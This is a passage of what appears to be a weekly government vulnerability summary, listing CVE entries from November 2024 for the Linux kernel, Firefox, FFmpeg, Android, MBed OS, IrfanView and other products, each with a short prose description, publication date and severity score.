In the Linux kernel, the following vulnerability has been resolved: nvme: make keep-alive synchronous operation The nvme keep-alive operation, which executes at a periodic interval, could potentially sneak in while shutting down a fabric controller. This may lead to a race between the fabric controller admin queue destroy code path (invoked while shutting down controller) and hw/hctx queue dispatcher called from the nvme keep-alive async request queuing operation. This race could lead to the kernel crash shown below: Call Trace: autoremove_wake_function+0x0/0xbc (unreliable) __blk_mq_sched_dispatch_requests+0x114/0x24c blk_mq_sched_dispatch_requests+0x44/0x84 blk_mq_run_hw_queue+0x140/0x220 nvme_keep_alive_work+0xc8/0x19c [nvme_core] process_one_work+0x200/0x4e0 worker_thread+0x340/0x504 kthread+0x138/0x140 start_kernel_thread+0x14/0x18 While shutting down fabric controller, if nvme keep-alive request sneaks in then it would be flushed off. The nvme_keep_alive_end_io function is then invoked to handle the end of the keep-alive operation which decrements the admin->q_usage_counter and assuming this is the last/only request in the admin queue then the admin->q_usage_counter becomes zero. If that happens then blk-mq destroy queue operation (blk_mq_destroy_ queue()) which could be potentially running simultaneously on another cpu (as this is the controller shutdown code path) would forward progress and deletes the admin queue. So, now from this point onward we are not supposed to access the admin queue resources. However the issue here's that the nvme keep-alive thread running hw/hctx queue dispatch operation hasn't yet finished its work and so it could still potentially access the admin queue resource while the admin queue had been already deleted and that causes the above crash. This fix helps avoid the observed crash by implementing keep-alive as a synchronous operation so that we decrement admin->q_usage_counter only after keep-alive command finished its execution and returns the command status back up to its caller (blk_execute_rq()). This would ensure that fabric shutdown code path doesn't destroy the fabric admin queue until keep-alive request finished execution and also keep-alive thread is not running hw/hctx queue dispatch operation. | 2024-11-25 | not yet calculated | CVE-2024-53102 |
| Mozilla--Firefox |
The application failed to account for exceptions thrown by the `loadManifestFromFile` method during add-on signature verification. This flaw, triggered by an invalid or unsupported extension manifest, could have caused runtime errors that disrupted the signature validation process. As a result, the enforcement of signature validation for unrelated add-ons may have been bypassed. Signature validation in this context is used to ensure that third-party applications on the user's computer have not tampered with the user's extensions, limiting the impact of this issue. This vulnerability affects Firefox < 133, Firefox ESR < 128.5, Thunderbird < 133, and Thunderbird < 128.5. | 2024-11-26 | not yet calculated | CVE-2024-11696 |
| Mozilla--Firefox |
On Android, Firefox may have inadvertently allowed viewing saved passwords without the required device PIN authentication. This vulnerability affects Firefox < 133. | 2024-11-26 | not yet calculated | CVE-2024-11703 |
| msg Suisse AG--EasyTax |
A XML External Entity (XXE) vulnerability has been identified in Easy Tax Client Software 2023 1.2 and earlier across multiple platforms, including Windows, Linux, and macOS. | 2024-11-29 | not yet calculated | CVE-2024-9044 |
| n/a--n/a |
FFmpeg n6.1.1 is Integer Overflow. The vulnerability exists in the parse_options function of sbgdec.c within the libavformat module. When parsing certain options, the software does not adequately validate the input. This allows for negative duration values to be accepted without proper bounds checking. | 2024-11-29 | not yet calculated | CVE-2024-35366 |
| n/a--n/a |
FFmpeg n6.1.1 has an Out-of-bounds Read via libavcodec/ppc/vp8dsp_altivec.c, static const vec_s8 h_subpel_filters_outer | 2024-11-29 | not yet calculated | CVE-2024-35367 |
| n/a--n/a |
FFmpeg n7.0 is affected by a Double Free via the rkmpp_retrieve_frame function within libavcodec/rkmppdec.c. | 2024-11-29 | not yet calculated | CVE-2024-35368 |
| n/a--n/a |
Ant-Media-Serverv2.8.2 is affected by Improper Output Neutralization for Logs. The vulnerability stems from insufficient input sanitization in the logging mechanism. Without proper filtering or validation, user-controllable data, such as identifiers or other sensitive information, can be included in log entries without restrictions. | 2024-11-29 | not yet calculated | CVE-2024-35371 |
| n/a--n/a |
LinkStack 2.7.9 through 4.7.7 allows resources\views\components\favicon.blade.php link SSRF. | 2024-11-29 | not yet calculated | CVE-2024-35451 |
| n/a--n/a |
A deserialization vulnerability exists in the Stub class of the VarDumper module in Symfony v7.0.3. The vulnerability stems from deficiencies in the original implementation when handling properties with null or uninitialized values. An attacker could construct specific serialized data and use this vulnerability to execute unauthorized code. | 2024-11-29 | not yet calculated | CVE-2024-36610 |
| n/a--n/a |
In Symfony v7.07, a security vulnerability was identified in the FormLoginAuthenticator component, where it failed to adequately handle cases where the username or password field of a login request is empty. This flaw could lead to various security risks, including improper authentication logic handling or denial of service. | 2024-11-29 | not yet calculated | CVE-2024-36611 |
| n/a--n/a |
Zulip from 8.0 to 8.3 contains a memory leak vulnerability in the handling of popovers. | 2024-11-29 | not yet calculated | CVE-2024-36612 |
| n/a--n/a |
FFmpeg n7.0 has a race condition vulnerability in the VP9 decoder. This could lead to a data race if video encoding parameters were being exported, as the side data would be attached in the decoder thread while being read in the output thread. | 2024-11-29 | not yet calculated | CVE-2024-36615 |
| n/a--n/a |
An integer overflow in the component /libavformat/westwood_vqa.c of FFmpeg n6.1.1 allows attackers to cause a denial of service in the application via a crafted VQA file. | 2024-11-29 | not yet calculated | CVE-2024-36616 |
| n/a--n/a |
FFmpeg n6.1.1 has an integer overflow vulnerability in the FFmpeg CAF decoder. | 2024-11-29 | not yet calculated | CVE-2024-36617 |
| n/a--n/a |
FFmpeg n6.1.1 has a vulnerability in the AVI demuxer of the libavformat library which allows for an integer overflow, potentially resulting in a denial-of-service (DoS) condition. | 2024-11-29 | not yet calculated | CVE-2024-36618 |
| n/a--n/a |
moby v25.0.0 - v26.0.2 is vulnerable to NULL Pointer Dereference via daemon/images/image_history.go. | 2024-11-29 | not yet calculated | CVE-2024-36620 |
| n/a--n/a |
moby v25.0.5 is affected by a Race Condition in builder/builder-next/adapters/snapshot/layer.go. The vulnerability could be used to trigger concurrent builds that call the EnsureLayer function resulting in resource leaks/exhaustion. | 2024-11-29 | not yet calculated | CVE-2024-36621 |
| n/a--n/a |
In RaspAP raspap-webgui 3.0.9 and earlier, a command injection vulnerability exists in the clearlog.php script. The vulnerability is due to improper sanitization of user input passed via the logfile parameter. | 2024-11-29 | not yet calculated | CVE-2024-36622 |
| n/a--n/a |
moby v25.0.3 has a Race Condition vulnerability in the streamformatter package which can be used to trigger multiple concurrent write operations resulting in data corruption or application crashes. | 2024-11-29 | not yet calculated | CVE-2024-36623 |
| n/a--n/a |
nodemcu before v3.0.0-release_20240225 was discovered to contain an integer overflow via the getnum function at /modules/struct.c. | 2024-11-29 | not yet calculated | CVE-2024-36671 |
| n/a--n/a |
MSA FieldServer Gateway 5.0.0 through 6.5.2 allows cross-origin WebSocket hijacking. | 2024-11-29 | not yet calculated | CVE-2024-45495 |
| n/a--n/a |
WithSecure Atlant (formerly F-Secure Atlant) 1.0.35-1 allows a remote Denial of Service because of memory corruption during scanning of a PE32 file. | 2024-12-01 | not yet calculated | CVE-2024-45520 |
| n/a--n/a |
OpenVidReview 1.0 is vulnerable to Incorrect Access Control. The /upload route is accessible without authentication, allowing any user to upload files. | 2024-11-27 | not yet calculated | CVE-2024-46054 |
| n/a--n/a |
Buffer Overflow vulnerability in SunBK201 umicat through v.0.3.2 and fixed in v.0.3.3 allows an attacker to execute arbitrary code via the power(uct_int_t x, uct_int_t n) in src/uct_upstream.c. | 2024-11-29 | not yet calculated | CVE-2024-48406 |
| n/a--n/a |
Incorrect access control in Adapt Learning Adapt Authoring Tool <= 0.11.3 allows attackers with Authenticated User roles to obtain email addresses via the "Get users" feature. The vulnerability occurs due to a flaw in permission verification logic, where the wildcard character in permitted URLs grants unintended access to endpoints restricted to users with Super Admin roles. This makes it possible for attackers to disclose the email addresses of all users. | 2024-11-25 | not yet calculated | CVE-2024-50671 |
| n/a--n/a |
qiwen-file v1.4.0 was discovered to contain a SQL injection vulnerability via the component /mapper/NoticeMapper.xml. | 2024-11-26 | not yet calculated | CVE-2024-50942 |
| n/a--n/a |
A SQL injection vulnerability has been identified in Siyuan 3.1.11 via the notebook parameter in /searchHistory. | 2024-11-29 | not yet calculated | CVE-2024-53504 |
| n/a--n/a |
A SQL injection vulnerability has been identified in Siyuan 3.1.11 via the id parameter at /getAssetContent. | 2024-11-29 | not yet calculated | CVE-2024-53505 |
| n/a--n/a |
A SQL injection vulnerability has been identified in Siyuan 3.1.11 via the ids array parameter in /batchGetBlockAttrs. | 2024-11-29 | not yet calculated | CVE-2024-53506 |
| n/a--n/a |
A SQL injection vulnerability was discovered in Siyuan 3.1.11 in /getHistoryItems. | 2024-11-29 | not yet calculated | CVE-2024-53507 |
| n/a--n/a |
Incorrect access control in the component l_0_0.xml of TP-Link ARCHER-C7 v5 allows attackers to access sensitive information. | 2024-11-29 | not yet calculated | CVE-2024-53623 |
| n/a--n/a |
In elisp-mode.el in GNU Emacs through 30.0.92, a user who chooses to invoke elisp-completion-at-point (for code completion) on untrusted Emacs Lisp source code can trigger unsafe Lisp macro expansion that allows attackers to execute arbitrary code. (This unsafe expansion also occurs if a user chooses to enable on-the-fly diagnosis that byte compiles untrusted Emacs Lisp source code.) | 2024-11-27 | not yet calculated | CVE-2024-53920 |
| OpenText--AccuRev for LDAP Integration |
Missing Authentication for Critical Function vulnerability in OpenTextâ„¢ AccuRev for LDAP Integration allows Authentication Bypass. The vulnerability could allow a valid AccuRev username to gain access to AccuRev source control without knowing the user's password. This issue affects AccuRev for LDAP Integration: 2017.1. | 2024-11-26 | not yet calculated | CVE-2019-17082 |
| Palo Alto Networks--GlobalProtect App |
An insufficient certification validation issue in the Palo Alto Networks GlobalProtect app enables attackers to connect the GlobalProtect app to arbitrary servers. This can enable a local non-administrative operating system user or an attacker on the same subnet to install malicious root certificates on the endpoint and subsequently install malicious software signed by the malicious root certificates on that endpoint. GlobalProtect App for Android is under evaluation. Please subscribe to our RSS feed https://security.paloaltonetworks.com/rss.xml to be alerted to new updates to this and other advisories. | 2024-11-27 | not yet calculated | CVE-2024-5921 |
| Red Hat--Red Hat build of Keycloak 24 |
A vulnerability was found in Keycloak. A user with high privileges could read sensitive information from a Vault file that is not within the expected context. This attacker must have previous high access to the Keycloak server in order to perform resource creation, for example, an LDAP provider configuration and set up a Vault read file, which will only inform whether that file exists or not. | 2024-11-25 | not yet calculated | CVE-2024-10492 |
| RIOT-OS--RIOT |
RIOT is an open-source microcontroller operating system, designed to match the requirements of Internet of Things (IoT) devices and other embedded devices. A malicious actor can send a IEEE 802.15.4 packet with spoofed length byte and optionally spoofed FCS, which eventually results into an endless loop on a CC2538 as receiver. Before PR #20998, the receiver would check for the location of the CRC bit using the packet length byte by considering all 8 bits, instead of discarding bit 7, which is what the radio does. This then results into reading outside of the RX FIFO. Although it prints an error when attempting to read outside of the RX FIFO, it will continue doing this. This may lead to a discrepancy in the CRC check according to the firmware and the radio. If the CPU judges the CRC as correct and the radio is set to `AUTO_ACK`, when the packet requests and acknowledgment the CPU will go into the state `CC2538_STATE_TX_ACK`. However, if the radio judged the CRC as incorrect, it will not send an acknowledgment, and thus the `TXACKDONE` event will not fire. It will then never return to the state `CC2538_STATE_READY` since the baseband processing is still disabled. Then the CPU will be in an endless loop. Since setting to idle is not forced, it won't do it if the radio's state is not `CC2538_STATE_READY`. A fix has not yet been made. | 2024-11-29 | not yet calculated | CVE-2024-53980 |
| sveltejs--kit |
SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. "Unsanitized input from *the request URL* flows into `end`, where it is used to render an HTML page returned to the user. This may result in a Cross-Site Scripting attack (XSS)." The files `packages/kit/src/exports/vite/dev/index.js` and `packages/kit/src/exports/vite/utils.js` both contain user controllable data which under specific conditions may flow to dev mode pages. There is little to no expected impact. The Vite development is not exposed to the network by default and even if someone were able to trick a developer into executing an XSS against themselves, a development database should not have any sensitive data. None the less this issue has been addressed in version 2.8.3 and all users are advised to upgrade. | 2024-11-25 | not yet calculated | CVE-2024-53261 |
| sveltejs--kit |
SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. The static error.html template for errors contains placeholders that are replaced without escaping the content first. error.html is the page that is rendered when everything else fails. It can contain the following placeholders: %sveltekit.status% - the HTTP status, and %sveltekit.error.message% - the error message. This leads to possible injection if an app explicitly creates an error with a message that contains user controlled content. Only applications where user provided input is used in the `Error` message will be vulnerable, so the vast majority of applications will not be vulnerable This issue has been addressed in version 2.8.3 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-11-25 | not yet calculated | CVE-2024-53262 |
| traefik--traefik |
Traefik (pronounced traffic) is an HTTP reverse proxy and load balancer. There is a vulnerability in Traefik that allows the client to provide the X-Forwarded-Prefix header from an untrusted source. This issue has been addressed in versions 2.11.14 and 3.2.1. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-11-29 | not yet calculated | CVE-2024-52003 |
| veraPDF--veraPDF-library |
veraPDF is an open source PDF/A validation library. Executing policy checks using custom schematron files via the CLI invokes an XSL transformation that may theoretically lead to a remote code execution (RCE) vulnerability. This doesn't affect the standard validation and policy checks functionality, veraPDF's common use cases. Most veraPDF users don't insert any custom XSLT code into policy profiles, which are based on Schematron syntax rather than direct XSL transforms. For users who do, only load custom policy files from sources you trust. This issue has not yet been patched. Users are advised to be cautious of XSLT code until a patch is available. | 2024-11-29 | not yet calculated | CVE-2024-52800 |
| vivo--Framework |
Improper control of framework service permissions with possibility of some sensitive device information leakage. | 2024-11-25 | not yet calculated | CVE-2020-12491 |
| vivo--Framework |
Improper handling of WiFi information by framework services can allow certain malicious applications to obtain sensitive information. | 2024-11-25 | not yet calculated | CVE-2020-12492 |
| vivo--Game Extension Engine |
The game extension engine of versions 1.2.7.0 and earlier exposes some components, and attackers can construct parameters to perform path traversal attacks, which can overwrite local specific files | 2024-11-28 | not yet calculated | CVE-2024-46939 |
Vulnerability Summary for the Week of November 18, 2024
Posted on Wednesday November 27, 2024
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 1000projects -- bookstore_management_system |
A vulnerability, which was classified as critical, has been found in 1000 Projects Bookstore Management System 1.0. Affected by this issue is some unknown functionality of the file /forget_password_process.php. The manipulation of the argument unm leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-11-21 | 9.8 | CVE-2024-11590 |
| angeljudesuarez -- tailoring_management_system |
A vulnerability was found in itsourcecode Tailoring Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /expedit.php. The manipulation of the argument expcat leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-11-23 | 9.8 | CVE-2024-11631 |
| angeljudesuarez -- tailoring_management_system |
A vulnerability classified as critical was found in itsourcecode Tailoring Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /expcatedit.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-11-21 | 8.8 | CVE-2024-11589 |
| antonhoelstad -- wp_quick_setup |
Unrestricted Upload of File with Dangerous Type vulnerability in Anton Hoelstad WP Quick Setup allows Upload a Web Shell to a Web Server.This issue affects WP Quick Setup: from n/a through 2.0. | 2024-11-18 | 8.8 | CVE-2024-52429 |
| arm -- mbed |
An issue was discovered in MBed OS 6.16.0. During processing of HCI packets, the software dynamically determines the length of the packet header by looking up the identifying first byte and matching it against a table of possible lengths. The initial parsing function, hciTrSerialRxIncoming does not drop packets with invalid identifiers but also does not set a safe default for the length of unknown packets' headers, leading to a buffer overflow. This can be leveraged into an arbitrary write by an attacker. It is possible to overwrite the pointer to a not-yet-allocated buffer that is supposed to receive the contents of the packet body. One can then overwrite the state variable used by the function to determine which state of packet parsing is currently occurring. Because the buffer is allocated when the last byte of the header has been copied, the combination of having a bad header length variable that will never match the counter variable and being able to overwrite the state variable with the resulting buffer overflow can be used to advance the function to the next step while skipping the buffer allocation and resulting pointer write. The next 16 bytes from the packet body are then written wherever the corrupted data pointer is pointing. | 2024-11-20 | 7.5 | CVE-2024-48981 |
| arm -- mbed |
An issue was discovered in MBed OS 6.16.0. Its hci parsing software dynamically determines the length of certain hci packets by reading a byte from its header. This value is assumed to be greater than or equal to 3, but the software doesn't ensure that this is the case. Supplying a length less than 3 leads to a buffer overflow in a buffer that is allocated later. It is simultaneously possible to cause another integer overflow by supplying large length values because the provided length value is increased by a few bytes to account for additional information that is supposed to be stored there. This bug is trivial to exploit for a denial of service but is not certain to suffice to bring the system down and can generally not be exploited further because the exploitable buffer is dynamically allocated. | 2024-11-20 | 7.5 | CVE-2024-48982 |
| arm -- mbed |
An issue was discovered in MBed OS 6.16.0. During processing of HCI packets, the software dynamically determines the length of the packet data by reading 2 bytes from the packet header. A buffer is then allocated to contain the entire packet, the size of which is calculated as the length of the packet body determined earlier plus the header length. WsfMsgAlloc then increments this again by sizeof(wsfMsg_t). This may cause an integer overflow that results in the buffer being significantly too small to contain the entire packet. This may cause a buffer overflow of up to 65 KB . This bug is trivial to exploit for a denial of service but can generally not be exploited further because the exploitable buffer is dynamically allocated. | 2024-11-20 | 7.5 | CVE-2024-48983 |
| arm -- mbed |
An issue was discovered in MBed OS 6.16.0. During processing of HCI packets, the software dynamically determines the length of the packet data by reading 2 bytes from the packet data. A buffer is then allocated to contain the entire packet, the size of which is calculated as the length of the packet body determined earlier and the header length. If the allocate fails because the specified packet is too large, no exception handling occurs and hciTrSerialRxIncoming continues to write bytes into the 4-byte large temporary header buffer, leading to a buffer overflow. This can be leveraged into an arbitrary write by an attacker. It is possible to overwrite the pointer to the buffer that is supposed to receive the contents of the packet body but which couldn't be allocated. One can then overwrite the state variable used by the function to determine which step of the parsing process is currently being executed. This advances the function to the next state, where it proceeds to copy data to that arbitrary location. The packet body is then written wherever the corrupted data pointer is pointing. | 2024-11-20 | 7.5 | CVE-2024-48985 |
| arm -- mbed |
An issue was discovered in MBed OS 6.16.0. Its hci parsing software dynamically determines the length of certain hci packets by reading a byte from its header. Certain events cause a callback, the logic for which allocates a buffer (the length of which is determined by looking up the event type in a table). The subsequent write operation, however, copies the amount of data specified in the packet header, which may lead to a buffer overflow. This bug is trivial to exploit for a denial of service but is not certain to suffice to bring the system down and can generally not be exploited further because the exploitable buffer is dynamically allocated. | 2024-11-20 | 7.5 | CVE-2024-48986 |
| avlditest -- libdoip |
A vulnerability was found in AVL-DiTEST-DiagDev libdoip 1.0.0. It has been rated as problematic. This issue affects the function DoIPConnection::reactOnReceivedTcpMessage of the file DoIPConnection.cpp. The manipulation leads to null pointer dereference. | 2024-11-21 | 7.5 | CVE-2024-11588 |
| cesanta -- mongoose |
Use of Out-of-range Pointer Offset vulnerability in Cesanta Mongoose Web Server v7.14 allows to write a NULL byte value beyond the memory space dedicated for the hostname field. | 2024-11-18 | 9.8 | CVE-2024-42383 |
| cesanta -- mongoose |
Integer Overflow or Wraparound vulnerability in Cesanta Mongoose Web Server v7.14 allows an attacker to send an unexpected TLS packet and produce a segmentation fault on the application. | 2024-11-18 | 7.5 | CVE-2024-42384 |
| cesanta -- mongoose |
Use of Out-of-range Pointer Offset vulnerability in Cesanta Mongoose Web Server v7.14 allows an attacker to send an unexpected TLS packet and produce a segmentation fault on the application. | 2024-11-18 | 7.5 | CVE-2024-42386 |
| cesanta -- mongoose |
Improper Neutralization of Delimiters vulnerability in Cesanta Mongoose Web Server v7.14 allows to trigger an infinite loop bug if the input string contains unexpected characters. | 2024-11-18 | 7.5 | CVE-2024-42392 |
| cesanta -- mongoose |
Improper Neutralization of Delimiters vulnerability in Cesanta Mongoose Web Server v7.14 allows to trigger an out-of-bound memory write if the PEM certificate contains unexpected characters. | 2024-11-18 | 7 | CVE-2024-42385 |
| code4berry -- decoration_management_system |
A vulnerability classified as critical was found in Code4Berry Decoration Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /decoration/admin/update_image.php of the component User Image Handler. The manipulation of the argument productimage1 leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-20 | 8.8 | CVE-2024-11484 |
| code4berry -- decoration_management_system |
A vulnerability has been found in Code4Berry Decoration Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /decoration/admin/btndates_report.php of the component Between Dates Reports. The manipulation of the argument fromdate/todate leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-20 | 8.8 | CVE-2024-11487 |
| code4berry -- decoration_management_system |
A vulnerability, which was classified as critical, has been found in Code4Berry Decoration Management System 1.0. Affected by this issue is some unknown functionality of the file /decoration/admin/userregister.php of the component User Handler. The manipulation leads to permission issues. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-20 | 8.1 | CVE-2024-11485 |
| dlink -- di-8003_firmware |
D-LINK DI-8003 v16.07.26A1 was discovered to contain a buffer overflow via the ip parameter in the ip_position_asp function. | 2024-11-19 | 9.8 | CVE-2024-52759 |
| dlink -- di-8200_firmware |
D-Link DI-8200 16.07.26A1 is vulnerable to remote command execution in the msp_info_htm function via the flag parameter and cmd parameter. | 2024-11-21 | 9.8 | CVE-2024-51151 |
| fabianros -- simple_car_rental_system |
A vulnerability was found in code-projects Simple Car Rental System 1.0. It has been classified as critical. Affected is an unknown function of the file /book_car.php. The manipulation of the argument fname/id_no/gender/email/phone/location leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only mentions the parameter "fname" to be affected. Further analysis indicates that other arguments might be affected as well. | 2024-11-23 | 9.8 | CVE-2024-11632 |
| google -- android |
In the getHost() function of UriTest.java, there is the possibility of incorrect web origin determination. This could lead to incorrect security decisions with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-20 | 9.8 | CVE-2018-9467 |
| google -- android |
In decrypt of ClearKeyCasPlugin.cpp there is a possible out-of-bounds write due to a missing bounds check. This could lead to remote arbitrary code execution with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-19 | 8.8 | CVE-2018-9411 |
| google -- android |
In ArrayConcatVisitor of builtins-array.cc, there is a possible type confusion due to improper input validation. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-19 | 8.8 | CVE-2018-9433 |
| google -- android |
In the xmlSnprintfElementContent function of valid.c, there is a possible out of bounds write. This could lead to remote escalation of privilege in an unprivileged app with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-19 | 8.8 | CVE-2018-9466 |
| google -- android |
In ResStringPool::setTo of ResourceTypes.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-19 | 7.8 | CVE-2018-9338 |
| google -- android |
In writeTypedArrayList and readTypedArrayList of Parcel.java, there is a possible escalation of privilege due to type confusion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-19 | 7.8 | CVE-2018-9339 |
| google -- android |
In impeg2d_mc_fullx_fully of impeg2d_mc.c there is a possible out of bound write due to missing bounds check. This could lead to remote arbitrary code execution with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-19 | 7.8 | CVE-2018-9341 |
| google -- android |
In several functions of DescramblerImpl.cpp, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-19 | 7.8 | CVE-2018-9344 |
| google -- android |
In IMSA_Recv_Thread and VT_IMCB_Thread of ImsaClient.cpp and VideoTelephony.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-19 | 7.8 | CVE-2018-9366 |
| google -- android |
In FT_ACDK_CCT_V2_OP_ISP_SET_TUNING_PARAS of Meta_CCAP_Para.cpp, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-19 | 7.8 | CVE-2018-9367 |
| google -- android |
In mtkscoaudio debugfs there is a possible arbitrary kernel memory write due to missing bounds check and weakened SELinux policies. This could lead to local escalation of privilege with system execution privileges needed. User interaction is not needed for exploitation. | 2024-11-19 | 7.8 | CVE-2018-9368 |
| google -- android |
In f_hidg_read and hidg_disable of f_hid.c, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-19 | 7.8 | CVE-2018-9417 |
| google -- android |
In CryptoPlugin::decrypt of CryptoPlugin.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-19 | 7.8 | CVE-2018-9424 |
| google -- android |
In startDevice of AAudioServiceStreamBase.cpp there is a possible out of bounds write due to a use after free. This could lead to local arbitrary code execution with no additional execution privileges needed. User interaction is needed for exploitation. https://source.android.com/security/bulletin/2018-07-01 | 2024-11-19 | 7.8 | CVE-2018-9428 |
| google -- android |
In createPhonebookDialogView and createMapDialogView of BluetoothPermissionActivity.java, there is a possible permissions bypass. This could lead to local escalation of privilege due to hiding and bypassing the user's ability to disable access to contacts, with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-19 | 7.8 | CVE-2018-9432 |
| google -- android |
In the LG LAF component, there is a special command that allowed modification of certain partitions. This could lead to bypass of secure boot. User interaction is not needed for exploitation. | 2024-11-19 | 7.5 | CVE-2018-9364 |
| google -- android |
In l2cble_process_sig_cmd of l2c_ble.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-19 | 7.5 | CVE-2018-9419 |
| google -- android |
In sdpu_extract_attr_seq of sdp_utils.cc, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-19 | 7.5 | CVE-2018-9456 |
| google -- android |
In bootloader there is fastboot command allowing user specified kernel command line arguments. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-19 | 7.3 | CVE-2018-9369 |
| google -- android |
In download.c there is a special mode allowing user to download data into memory and causing possible memory corruptions due to missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-19 | 7.3 | CVE-2018-9370 |
| h3c -- gr-1800ax_firmware |
H3C GR-1800AX MiniGRW1B0V100R007 is vulnerable to remote code execution (RCE) via the aspForm parameter. | 2024-11-20 | 9.8 | CVE-2024-52765 |
| hkcms -- hkcms |
HkCms <= v2.3.2.240702 is vulnerable to file upload in the getFileName method in /app/common/library/Upload.php. | 2024-11-20 | 9.8 | CVE-2024-52677 |
| irfanview -- irfanview |
IrfanView ECW File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of ECW files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23971. | 2024-11-22 | 7.8 | CVE-2024-11513 |
| irfanview -- irfanview |
IrfanView ECW File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of ECW files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23975. | 2024-11-22 | 7.8 | CVE-2024-11514 |
| irfanview -- irfanview |
IrfanView JPM File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JPM files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24010. | 2024-11-22 | 7.8 | CVE-2024-11515 |
| irfanview -- irfanview |
IrfanView JPM File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JPM files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24011. | 2024-11-22 | 7.8 | CVE-2024-11516 |
| irfanview -- irfanview |
IrfanView JPM File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JPM files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24118. | 2024-11-22 | 7.8 | CVE-2024-11517 |
| irfanview -- irfanview |
IrfanView RLE File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of RLE files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24444. | 2024-11-22 | 7.8 | CVE-2024-11518 |
| irfanview -- irfanview |
